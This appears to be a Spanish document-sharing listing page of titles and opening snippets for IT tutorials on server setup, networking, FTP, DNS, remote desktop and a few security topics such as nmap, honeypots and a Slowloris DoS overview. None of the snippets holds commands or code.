1/ XAMPP: más fácil imposible. Vamos directamente a la página de descarga de Apache Friends para Windows Moodle en XAMPP Presentación Xampp Moodle 1.9 Moodle 2.0 Moodle exprés Xampp Lite 1/ XAMPP: más fácil imposible 1.1/ Obtención de XAMPP Vamos directamente a la página de descarga de Apache Friends para

Más detalles

La página web del centro con SPIP

La página web del centro con SPIP La página web del centro con SPIP Ponente: Daniel López Avellaneda 8 - Práctica en Internet Manual para el curso organizado por: CEP provincia de Córdoba http://cibermatex.com/?page=suscripciones 28 Enero

Más detalles

4.2- Instalación y Configuración de un Servidor DNS Dnsmasq en Ubuntu sin DHCP

4.2- Instalación y Configuración de un Servidor DNS Dnsmasq en Ubuntu sin DHCP 4.2- Instalación y Configuración de un Servidor DNS Dnsmasq en Ubuntu sin DHCP Dnsmasq es un paquete que incluye un servidor DNS y DHCP. El servidor DNS es un servidor muy sencillo que no contiene zonas

Más detalles

Tenemos que instalar los programas de los usuarios también (los anteriormente mencionados) y los siguientes que vamos a nombrar.

Tenemos que instalar los programas de los usuarios también (los anteriormente mencionados) y los siguientes que vamos a nombrar. TUTORIAL INCEME Programas necesarios PC s usuarios En los ordenadores donde se va a ejecutar INCEME van hacer falta una serie de programas para su funcionamiento. Tendremos que tener los.net Framework

Más detalles

Manual de usuario Noticias y Accesos Directos en Facultades ÍNDICE

Manual de usuario Noticias y Accesos Directos en Facultades ÍNDICE Manual de usuario Noticias y Accesos Directos en Facultades ÍNDICE 1. PARA QUÉ SIRVE ESTA APLICACIÓN? 2. QUIÉN PUEDE HACER USO DE ELLA? 3. CÓMO SE UTILIZA? 1. PARA QUE SIRVE ESTA APLICACIÓN? El objeto

Más detalles

Instituto Tecnológico Las Américas (ITLA) Sistemas Operativos 3 (SO3) Daniel Alejandro Moreno Martínez. Matrícula: 2010-2946.

Instituto Tecnológico Las Américas (ITLA) Sistemas Operativos 3 (SO3) Daniel Alejandro Moreno Martínez. Matrícula: 2010-2946. Instituto Tecnológico Las Américas (ITLA) Sistemas Operativos 3 (SO3) Daniel Alejandro Moreno Martínez Matrícula: 2010-2946 How to How to: Servidor FTP!!! Servidor FTP El protocolo FTP (File Transfer Protocol)

Más detalles

INSTALACION DEL Terminal Services. Instalamos el Terminal Services. Siguiente. Nos saldrá una advertencia, seleccionamos instalar.

INSTALACION DEL Terminal Services. Instalamos el Terminal Services. Siguiente. Nos saldrá una advertencia, seleccionamos instalar. INSTALACION DEL Terminal Services Instalamos el Terminal Services Siguiente Nos saldrá una advertencia, seleccionamos instalar Siguiente Seleccionamos todas y agregamos todas las funciones que hagan falta

Más detalles

Hostaliawhitepapers. Usar Plesk para, poner en marcha nuestro dominio.

Hostaliawhitepapers. Usar Plesk para, poner en marcha nuestro dominio. Usar Plesk para, poner en marcha nuestro dominio. Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199 www.hostalia.com Dominio y alojamiento web Registrar un dominio no es sinónimo de tener

Más detalles

Redes de área local: Aplicaciones y servicios WINDOWS

Redes de área local: Aplicaciones y servicios WINDOWS Redes de área local: Aplicaciones y servicios WINDOWS 7. Escritorio remoto 1 Índice Definición de Escritorio Remoto... 3 Habilitar Escritorio Remoto... 4 Instalación del cliente de Escritorio Remoto...

Más detalles

Manual del panel. Core-Admin

Manual del panel. Core-Admin Manual del panel Core-Admin - Manual del panel Core-Admin ÍNDICE 1. Introducción...3 2. Requisitos iniciales...3 2.1. Navegadores soportados...3 2.2. Javascript y Java...3 3. Usar Core-Admin...3 3.1. Acceder

Más detalles

NOTA. HONEYPOT II Servicios con HoneyBOT. Objetivo: Usar un honeypot con varios servicios de interacción media. Herramientas necesarias:

NOTA. HONEYPOT II Servicios con HoneyBOT. Objetivo: Usar un honeypot con varios servicios de interacción media. Herramientas necesarias: HONEYPOT II Servicios con HoneyBOT Popularidad: 8 Simplicidad: 10 Impacto: 5 Nivel de Riesgo: 2 Objetivo: Usar un honeypot con varios servicios de interacción media Herramientas necesarias: HoneyBOT (http://www.atomicsoftwaresolutions.com/download.php)

Más detalles

Detectar y solucionar infecciones en un sitio web

Detectar y solucionar infecciones en un sitio web Detectar y solucionar infecciones en un sitio web Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199 www.hostalia.com Las infecciones que sufren los sitios web son uno de los principales

Más detalles

La herramienta nmap. Nmap. Roberto Gómez Cárdenas rogomez@itesm.mx http://homepage.cem.itesm.mx/rogomez. La herramienta nmap. Dr.

La herramienta nmap. Nmap. Roberto Gómez Cárdenas rogomez@itesm.mx http://homepage.cem.itesm.mx/rogomez. La herramienta nmap. Dr. Cárdenas Roberto Gómez Cárdenas rogomez@itesm.mx http://homepage.cem.itesm.mx/rogomez Lámina 1 Nmap Lámina 2 1 Cárdenas Matrix y nmap Lámina 3 Características Nmap NMAP Network Security Scanner Herramienta

Más detalles

CITRIX 4.5 - Citrix Application Streaming

CITRIX 4.5 - Citrix Application Streaming 1 de 39 01/12/2007 1:06 CITRIX 4.5 - Citrix Application Streaming Es la caracteristica principal de la versión 4.5 de Citrix, el Application Streaming, en este documento se explica cómo usarlo. Application

Más detalles

Guía Rápida de Inicio

Guía Rápida de Inicio Guía Rápida de Inicio 1. Acerca de esta Guía Esta guía le ayudará a instalar y dar los primeros pasos con BitDefender Security for SharePoint. Para disponer de instrucciones detalladas, por favor, diríjase

Más detalles

RETO HACKER DE VERANO

RETO HACKER DE VERANO RETO HACKER DE VERANO Blind XPath Reto Hacker de verano Índice 1 Introducción... 2 2 Proceso de trabajo... 2 2.1 Toma de contacto (fingerprinting)... 2 2.2 Comienza el ataque... 4 2.3 Explicacion del ataque

Más detalles

Laboratorio de Redes y Sistemas Operativos Trabajo Práctico Final

Laboratorio de Redes y Sistemas Operativos Trabajo Práctico Final Laboratorio de Redes y Sistemas Operativos Trabajo Práctico Final Tema: Instalación de X2GO Profesor: Di Biase José Luis Integrantes: Cardozo Griselda Chiniewicz Stefania Arnez Inochea Eric 1 Índice: 1.

Más detalles

Software de Comunicaciones. Práctica 7 - Secure Shell. SSH

Software de Comunicaciones. Práctica 7 - Secure Shell. SSH Software de Comunicaciones Práctica 7 - Secure Shell. SSH Juan Díez-Yanguas Barber Software de Comunicaciones Ingeniería Informática - 5º Curso Jdyb - Mayo 2013 Juan Díez- Yanguas Barber Práctica 7 Índice

Más detalles

ATAQUE CON SLOWLORIS A SERVIDORES APACHE VULNERABLES

ATAQUE CON SLOWLORIS A SERVIDORES APACHE VULNERABLES ATAQUE CON SLOWLORIS A SERVIDORES APACHE VULNERABLES ATAQUES DoS (Denegacion de Servicio) Se genera mediante la saturación de los puertos con flujo de información, haciendo que el servidor se sobrecargue

Más detalles

Como crear un túnel entre dos PC s usando el Protocolo SSH

Como crear un túnel entre dos PC s usando el Protocolo SSH Como crear un túnel entre dos PC s usando el Protocolo SSH 1) Que es SSH: Según la Wiki SSH (Secure SHell, en español: intérprete de órdenes segura) es el nombre de un protocolo y del programa que lo implementa,

Más detalles

Solución de actividad 2.2.5: Uso de NeoTrace para ver Internetworks

Solución de actividad 2.2.5: Uso de NeoTrace para ver Internetworks Solución de actividad 2.2.5: Uso de NeoTrace para ver Internetworks Objetivos de aprendizaje Explicar el uso de programas de rastreo de rutas, como tracert y NeoTrace. Usar tracert y NeoTrace para rastrear

Más detalles

Certified Offensive and Defensive Security Professional - Entrenamiento E-learning - 3-SCANNING. www.dsteamseguridad.com

Certified Offensive and Defensive Security Professional - Entrenamiento E-learning - 3-SCANNING. www.dsteamseguridad.com 3-SCANNING NETWORK MAPPING. El proceso de Network Mapping, consiste en tratar de identificar la arquitectura (Topología) de la red a la cual vamos a realizarle las pruebas de seguridad y auditoria a nivel

Más detalles

Instalar protocolo, cliente o servicio nuevo. Seleccionar ubicación de red. Práctica - Compartir y conectar una carpeta

Instalar protocolo, cliente o servicio nuevo. Seleccionar ubicación de red. Práctica - Compartir y conectar una carpeta Configuración de una red con Windows Aunque existen múltiples sistemas operativos, el más utilizado en todo el mundo sigue siendo Windows de Microsoft. Por este motivo, vamos a aprender los pasos para

Más detalles

Notas para la instalación de un lector de tarjetas inteligentes.

Notas para la instalación de un lector de tarjetas inteligentes. Notas para la instalación de un lector de tarjetas inteligentes. Índice 0. Obtención de todo lo necesario para la instalación. 3 1. Comprobación del estado del servicio Tarjeta inteligente. 4 2. Instalación

Más detalles

Instalación de FileZilla FTP Server

Instalación de FileZilla FTP Server Instalación de FileZilla FTP Server [Ir a Página principal] El proceso de instalación es muy sencillo, solamente en algunos pasos tendremos que realizar acciones como elegir el tipo de instalación o de

Más detalles

Práctica 3: Estudio de los protocolos HTTP, SMTP, POP3 e IMAP mediante un analizador de red: Wireshark

Práctica 3: Estudio de los protocolos HTTP, SMTP, POP3 e IMAP mediante un analizador de red: Wireshark FUNDAMENTOS DE REDES DE COMPUTADORES Curso 2009/2010 Práctica 3: Estudio de los protocolos HTTP, SMTP, POP3 e IMAP mediante un analizador de red: Wireshark Introducción En esta práctica vamos a trabajar

Más detalles

Práctica 4 - Network Address Translation (NAT)

Práctica 4 - Network Address Translation (NAT) Práctica 4 - Network Address Translation (NAT) 1- Objetivos NAT permite que una red IP parezca hacia el exterior que emplea un espacio de direcciones diferente del que en realidad usa. La utilidad más

Más detalles

REDES DE ÁREA LOCAL. APLICACIONES Y SERVICIOS EN WINDOWS

REDES DE ÁREA LOCAL. APLICACIONES Y SERVICIOS EN WINDOWS REDES DE ÁREA LOCAL. APLICACIONES Y SERVICIOS EN WINDOWS Escritorio remoto - 1 - Escritorio Remoto...- 3 - Definición de Escritorio Remoto... - 3 - Habilitar Escritorio Remoto... - 4 - Instalación del

Más detalles

Metasploit framework, al igual que nessus, su versión paga es mucho más informática que la gratuita.

Metasploit framework, al igual que nessus, su versión paga es mucho más informática que la gratuita. Ethical Hacking en modo Gráfico Herramientas para hacking ético hay muchas, las profesionales o pagas ofrecen informes mucho más detallados que las no pagas, pero ambas nos dan un indicio de que es lo

Más detalles

Guia rápida EPlus Cliente-Servidor

Guia rápida EPlus Cliente-Servidor Guia rápida EPlus Cliente-Servidor Esta guía permitirá al usuario instalar la aplicación e-plus, para firmar y declarar sus trámites a través de acceso remoto. CONSIDERACIONES GENERALES.- El software eplus

Más detalles

TRANSFERENCIA DE FICHEROS FTP

TRANSFERENCIA DE FICHEROS FTP TRANSFERENCIA DE FICHEROS FTP INTRODUCCIÓN Internet basa su funcionamiento en un conjunto de protocolos de red sin los cuales la comunicación, a cualquier nivel, sería imposible. Algunos de los protocolos

Más detalles

Hacking Ético. Módulo II Fase 2: Técnicas activas de obtención de información: Escaneo

Hacking Ético. Módulo II Fase 2: Técnicas activas de obtención de información: Escaneo Hacking Ético Módulo II Fase 2: Técnicas activas de obtención de información: Escaneo Objetivos Detectar sistemas vivos en la red. Descubrir servicios que se están ejecutando o que están escuchando en

Más detalles

Windows 2008 Server ServidorW200854

Windows 2008 Server ServidorW200854 Windows 2008 Server ServidorW200854 Practica Instalación del servidor FTP Filezilla en Windows Se accede a la web de filezilla (http://filezilla-project.org/) y se descarga el servidor FTP. O en la dirección:

Más detalles

Programa diseñado y creado por 2014 - Art-Tronic Promotora Audiovisual, S.L.

Programa diseñado y creado por 2014 - Art-Tronic Promotora Audiovisual, S.L. Manual de Usuario Programa diseñado y creado por Contenido 1. Acceso al programa... 3 2. Opciones del programa... 3 3. Inicio... 4 4. Empresa... 4 4.2. Impuestos... 5 4.3. Series de facturación... 5 4.4.

Más detalles

Configurar un Servidor FTP. Serv-U

Configurar un Servidor FTP. Serv-U Página 1 de 13 Configurar un Servidor FTP. Serv-U Todos los programas servidores FTP son muy similares por lo que estas notas y fotos te pueden valer para aprender a configurar otros servidores FTP. Además

Más detalles

Guía rápida de instalación Cámara CCTV-210

Guía rápida de instalación Cámara CCTV-210 Guía rápida de instalación Cámara CCTV-210 Ya conecté la cámara a mi MODEM, pero no veo nada. Qué puedo hacer? A continuación damos una guía sencilla y rápida para instalar las cámara dentro de una red

Más detalles

CONFIGURACIÓN DEL SERVIDOR

CONFIGURACIÓN DEL SERVIDOR CONFIGURACIÓN DEL SERVIDOR Una vez finalizadas las configuraciones iniciales de las interfaces y direcciones IPs, desde cualquier equipo de la red abrimos el navegador e introducimos la dirección IP del

Más detalles

SERVIDOR DNS DINÁMICO EN WINDOWS 2000/2003 SERVER.

SERVIDOR DNS DINÁMICO EN WINDOWS 2000/2003 SERVER. SERVIDOR DNS DINÁMICO EN WINDOWS 2000/2003 SERVER. 1. Introducción. El objetivo de un servidor DNS dinámico es integrar la funcionalidad del mismo junto a la de un servidor DHCP de forma que, cuando éste

Más detalles

MANUAL DE CREACIÓN DE CARPETAS PARA ACCESO POR FTP DE CLIENTES EN UN NAS

MANUAL DE CREACIÓN DE CARPETAS PARA ACCESO POR FTP DE CLIENTES EN UN NAS MANUAL DE CREACIÓN DE CARPETAS PARA ACCESO POR FTP DE CLIENTES EN UN NAS Vamos a explicar en varios pasos cómo crear una carpeta para que un cliente concreto con un usuario y una contraseña acceda sólo

Más detalles

2. Instalación y configuración del servidor FTP IIS en Windows 2008 Server.

2. Instalación y configuración del servidor FTP IIS en Windows 2008 Server. YOLANDA ALBEROLA MARTÍNEZ 2. Instalación y configuración del servidor FTP IIS en Windows 2008 Server. 1- Lo primero que tenemos que hacer es desista-lar FTP 6.0 que tenemos instalado en nuestro servidor.

Más detalles

P r á c t i c a 1 5. C o n f i g u r a c i ó n d e f i r e w a l l m e d i a n t e i p t a b l e s

P r á c t i c a 1 5. C o n f i g u r a c i ó n d e f i r e w a l l m e d i a n t e i p t a b l e s P r á c t i c a 1 5 C o n f i g u r a c i ó n d e f i r e w a l l m e d i a n t e i p t a b l e s Configuración del firewall 1. Conéctate a tu máquina virtual Centos y utiliza la cuenta de root. 2. Crea

Más detalles

Práctica GESTIÓN Y UTILIZACIÓN DE REDES LOCALES. Curso 2001/2002. TCP/IP: protocolo TCP

Práctica GESTIÓN Y UTILIZACIÓN DE REDES LOCALES. Curso 2001/2002. TCP/IP: protocolo TCP Práctica 9 GESTIÓN Y UTILIZACIÓN DE REDES LOCALES Curso 2001/2002 TCP/IP: protocolo TCP Introducción Como se ha comentado en la práctica anterior, el protocolo UDP es muy sencillo de implementar, pero

Más detalles

Luis Eduardo Peralta Molina Sistemas Operativos Instructor: José Doñe 2010-2940. Como crear un Servidor DHCP en ClearOS

Luis Eduardo Peralta Molina Sistemas Operativos Instructor: José Doñe 2010-2940. Como crear un Servidor DHCP en ClearOS Servidores DHCP Como crear un Servidor DHCP en ClearOS Dynamic Host Configuration Protocol (DHCP) Protocolo de Configuracion Dinamica de Host, es un protocolo de Red que asigna automaticamente informacion

Más detalles

helppeople Viewer 2013

helppeople Viewer 2013 helppeople Viewer 2013 helppeople Viewer. helppeople Viewer es una aplicación que permite visualizar la pantalla de otro computador, conectado a la red, en su propia pantalla. Además, este programa le

Más detalles

How to Crear Servidor Samba

How to Crear Servidor Samba How to Crear Servidor Samba En este tutorial aprenderemos a crear un servidor Samba. Pero antes que nada debemos saber que es Samba, y para que sirve. Que es Samba? Samba es una implementación libre del

Más detalles

Internet Information Server

Internet Information Server Internet Information Server Internet Information Server (IIS) es el servidor de páginas web avanzado de la plataforma Windows. Se distribuye gratuitamente junto con las versiones de Windows basadas en

Más detalles

REDES DE ÁREA LOCAL. APLICACIONES Y SERVICIOS EN WINDOWS

REDES DE ÁREA LOCAL. APLICACIONES Y SERVICIOS EN WINDOWS REDES DE ÁREA LOCAL. APLICACIONES Y SERVICIOS EN WINDOWS Servicio DNS - 1 - Servicio DNS...- 3 - Definición... - 3 - Instalación... - 5 - Configuración del Servidor DNS...- 10 - - 2 - Servicio DNS Definición

Más detalles

UNIDAD DIDACTICA 4 INTEGRACIÓN DE CLIENTES WINDOWS EN UN DOMINIO

UNIDAD DIDACTICA 4 INTEGRACIÓN DE CLIENTES WINDOWS EN UN DOMINIO UNIDAD DIDACTICA 4 INTEGRACIÓN DE CLIENTES Eduard Lara 1 1. CONFIGURACIÓN PREVIA DE LOS CLIENTES WINDOWS Objetivo: Configurar los clientes Windows XP/Vista en red para posteriormente poderlos integrar

Más detalles

3. Qué necesitamos para usar Wordpress?

3. Qué necesitamos para usar Wordpress? Contenido 1. Objetivos de este tutorial... 2 2. Qué es Wordpress?... 2 3. Qué necesitamos para usar Wordpress?... 2 3.1 Alojamiento web... 3 3.2 DOMINIO O DIRECCIÓN DE INTERNET... 3 3.3 Cuenta FTP... 4

Más detalles

Archivo de correo con Microsoft Outlook contra Exchange Server

Archivo de correo con Microsoft Outlook contra Exchange Server Archivo de correo con Microsoft Outlook contra Exchange Server Resumen Con este proceso de archivado, lo que pretendemos es guardar nuestro correo en un archivo de datos, para así poder realizar una copia

Más detalles

Escritorio remoto y VPN. Cómo conectarse desde Windows 7

Escritorio remoto y VPN. Cómo conectarse desde Windows 7 Escritorio remoto y VPN. Cómo conectarse desde Windows 7 Hay ocasiones en las que es necesario conectarnos a un equipo informático situado a mucha distancia de donde nos encontramos para realizar sobre

Más detalles

Clientes del dominio

Clientes del dominio INGENIERIA EN SISTEMAS COMPUTACIONALES MATERIA: Administración de servidores 8-Abril-2015 Reporte de practica 1 Unid. 2 Clientes del dominio Brayan Antonio Alcantara Ortega Sergio Armando Pérez Páez Adán

Más detalles

Redes Locales: El protocolo TCP/IP

Redes Locales: El protocolo TCP/IP Redes Locales: El protocolo TCP/IP Los protocolos de red son las reglas que siguen los equipos conectados a la red para poder comunicarse entre sí, y hablar así el mismo idioma. El grupo de protocolos

Más detalles

SIEWEB. La intranet corporativa de SIE

SIEWEB. La intranet corporativa de SIE La intranet corporativa de SIE por ALBA Software Acceso a los servicios SIE desde páginas Web para los usuarios de sistema *. Administración del Sistema (cuentas de usuarios, permisos, servicios, etc...)

Más detalles

Instituto Tecnológico de Las Américas (ITLA)

Instituto Tecnológico de Las Américas (ITLA) Instituto Tecnológico de Las Américas (ITLA) Sistema Operativo 3 (SO3) Abel Eliezer Mejía Amador Matricula: 2011-3891 How to: Servidor FTP Servidor FTP El protocolo FTP (File Transfer Protocol) es una

Más detalles

MANUAL DE AYUDA TAREA PROGRAMADA COPIAS DE SEGURIDAD

MANUAL DE AYUDA TAREA PROGRAMADA COPIAS DE SEGURIDAD MANUAL DE AYUDA TAREA PROGRAMADA COPIAS DE SEGURIDAD Fecha última revisión: Diciembre 2010 Tareas Programadas TAREAS PROGRAMADAS... 3 LAS TAREAS PROGRAMADAS EN GOTELGEST.NET... 4 A) DAR DE ALTA UN USUARIO...

Más detalles

MANUAL DE INSTALACIÓN DEL COMPONENTE WEBSIGNER ACTIVEX. Versión 4.0

MANUAL DE INSTALACIÓN DEL COMPONENTE WEBSIGNER ACTIVEX. Versión 4.0 MANUAL DE INSTALACIÓN DEL COMPONENTE WEBSIGNER ACTIVEX Versión 4.0 1 Control Versión 1.0 Fecha: 01-07-2011 Modificaciones: Primera versión. Versión 2.0 Fecha: 22-09-2011 Modificaciones: Adaptado a websigner

Más detalles

Manual para la utilización de PrestaShop

Manual para la utilización de PrestaShop Manual para la utilización de PrestaShop En este manual mostraremos de forma sencilla y práctica la utilización del Gestor de su Tienda Online mediante Prestashop 1.6, explicaremos todo lo necesario para

Más detalles

Servicio de Informática Vicerrectorado de Tecnologías de la Información y la Comunicación

Servicio de Informática Vicerrectorado de Tecnologías de la Información y la Comunicación Vicerrectorado de Tecnologías de la Información y la Comunicación Conexión mediante Escritorio Remoto de Windows Última Actualización 16 de septiembre de 2013 Histórico de cambios Fecha Descripción Autor

Más detalles

Explotación de Sistemas Informáticos IES Murgi 2006-2007 PRÁCTICA 9: SERVICIO WEB Y FTP DE INTERNET INFORMATION SERVICE

Explotación de Sistemas Informáticos IES Murgi 2006-2007 PRÁCTICA 9: SERVICIO WEB Y FTP DE INTERNET INFORMATION SERVICE PRÁCTICA 9: SERVICIO WEB Y FTP DE INTERNET INFORMATION SERVICE Índice 1. Instalación...2 2. Administrar los sitios Web... 4 3. Crear un nuevo sitio Web... 4 4. Creación de directorios virtuales... 5 5.

Más detalles

Instalación y configuración del servidor FTP Filezilla en Windows 2003 Server. Vicente Sánchez Patón I.E.S Gregorio Prieto.

Instalación y configuración del servidor FTP Filezilla en Windows 2003 Server. Vicente Sánchez Patón I.E.S Gregorio Prieto. Tema 5 SRI Instalación y configuración del servidor FTP Filezilla en Windows 2003 Server Vicente Sánchez Patón I.E.S Gregorio Prieto Tema 5 SRI Lo primero será descargarse el filezilla sever, desde su

Más detalles

MANUAL COPIAS DE SEGURIDAD

MANUAL COPIAS DE SEGURIDAD MANUAL COPIAS DE SEGURIDAD Índice de contenido Ventajas del nuevo sistema de copia de seguridad...2 Actualización de la configuración...2 Pantalla de configuración...3 Configuración de las rutas...4 Carpeta

Más detalles

UNIDAD DIDACTICA 15 CONVERTIR UN EQUIPO LINUX SERVER EN CONTROLADOR DE DOMINIO

UNIDAD DIDACTICA 15 CONVERTIR UN EQUIPO LINUX SERVER EN CONTROLADOR DE DOMINIO UNIDAD DIDACTICA 15 CONVERTIR UN EQUIPO LINUX SERVER EN CONTROLADOR DE DOMINIO Eduard Lara 1 1. CONVERTIR UN LINUX SERVER EN CONTROLADOR DE DOMINIO En Linux Server, a diferencia de Windows Server, no existe

Más detalles

BREVE INTRODUCCIÓN A IPSEC

BREVE INTRODUCCIÓN A IPSEC La seguridad ha sido, desde siempre, el gran caballo de batalla para los administradores de sistemas. Dentro de las múltiples soluciones que podemos implementar en nuestra instalación nos centraremos hoy

Más detalles

ACTIVE DIRECTORY - PROPIEDADES DE USUARIO

ACTIVE DIRECTORY - PROPIEDADES DE USUARIO 1 de 17 01/12/2007 1:25 ACTIVE DIRECTORY - PROPIEDADES DE USUARIO Directorio activo, En este procedimiento se explica lo básico de cómo organizar el directorio activo con unidades organizativas, cómo crear

Más detalles

Manual de usuario de Windows Live Writer

Manual de usuario de Windows Live Writer Manual de usuario de Windows Live Writer Índice 0.- Introducción. 3 1.- Descarga e Instalación. 4 2.- Conexión a un blog. 7 3.- Interfaz de Windows Live Writer. 12 4.- Creación de un Post. 13 5.- Creación

Más detalles

Integración de Magento & Dynamics NAV

Integración de Magento & Dynamics NAV Integración de Magento & Dynamics NAV Integración de Magento & Dynamics NAV Integración de Magento & Dynamics NAV Presentamos una nueva solución que comunica la plataforma de Tiendas virtuales de Magento

Más detalles

Software Demo Servidor. Active Search Engine. Myrasoft Active Search Engine versión Demo. Manual de Uso

Software Demo Servidor. Active Search Engine. Myrasoft Active Search Engine versión Demo. Manual de Uso Software Demo Servidor Active Search Engine Myrasoft Active Search Engine versión Demo Manual de Uso M Y R A S O F T A C T I V E S E A R C H E N G I N E Manual de Uso: versión Demo Todos los derechos reservados.

Más detalles

Gracias a ese IP único que tiene cada ordenador conectado a la red de internet se pueden identificar y comunicar los ordenadores.

Gracias a ese IP único que tiene cada ordenador conectado a la red de internet se pueden identificar y comunicar los ordenadores. COMO FUNCIONA INTERNET Internet es una gran red de ordenadores a nivel mundial, que pueden intercambiar información entre ellos. Se pueden comunicar porque están unidos a través de conexiones telefónicas,

Más detalles

http://www.bujarra.com/procedimientofortigatevpnssl.html Fortigate - VPN SSL

http://www.bujarra.com/procedimientofortigatevpnssl.html Fortigate - VPN SSL 1 de 14 01/12/2007 1:11 Fortigate - VPN SSL VPN con SSL, En este procedimiento se explica cómo configurar una VPN usando SSL para conectarse con un PC cualquiera desde internet a la LAN de la organización.

Más detalles

pchelpware, asistencia remota libre

pchelpware, asistencia remota libre por Alejandro Moreno amperisblog[@]gmail.com http://amperis.blogspot.com 06 de marzo de 2008 Introducción Todos los administradores de redes conocen el protocolo vnc y por tanto todas las implementaciones

Más detalles

Migrar una organización Microsoft Exchange 2003 a Microsoft Exchange 2007

Migrar una organización Microsoft Exchange 2003 a Microsoft Exchange 2007 1 de 20 10/09/2008 13:53 Migrar una organización Microsoft Exchange 2003 a Microsoft Exchange 2007 Migrar Exchange 2003 a Exchange 2007 o Exchange 2000 a Exchange 2007, Bueno, en este documento veremos

Más detalles

Terminal de Información al Cliente

Terminal de Información al Cliente Terminal de Información al Cliente Rev. 1.0 20110509 Leer antes de usar Por favor, si está configurando un terminal de información, siga todas las instrucciones paso a paso y lea todo el documento. Propósito

Más detalles

Cobian Backup. Inguralde [Enero 2011]

Cobian Backup. Inguralde [Enero 2011] Inguralde [Enero 2011] 1. Introducción Cobian Backup es un programa multitarea capaz de crear copias de seguridad en un equipo, en una red local o incluso en/desde un servidor FTP. Se ejecuta sobre Windows

Más detalles

Concepto de Seguridad de Alto Nivel: A lo largo del curso hemos establecido protecciones en los equipos y en la información que almacenan e

Concepto de Seguridad de Alto Nivel: A lo largo del curso hemos establecido protecciones en los equipos y en la información que almacenan e Concepto de Seguridad de Alto Nivel: A lo largo del curso hemos establecido protecciones en los equipos y en la información que almacenan e intercambian. En este último capítulo vamos a abordar los sistemas

Más detalles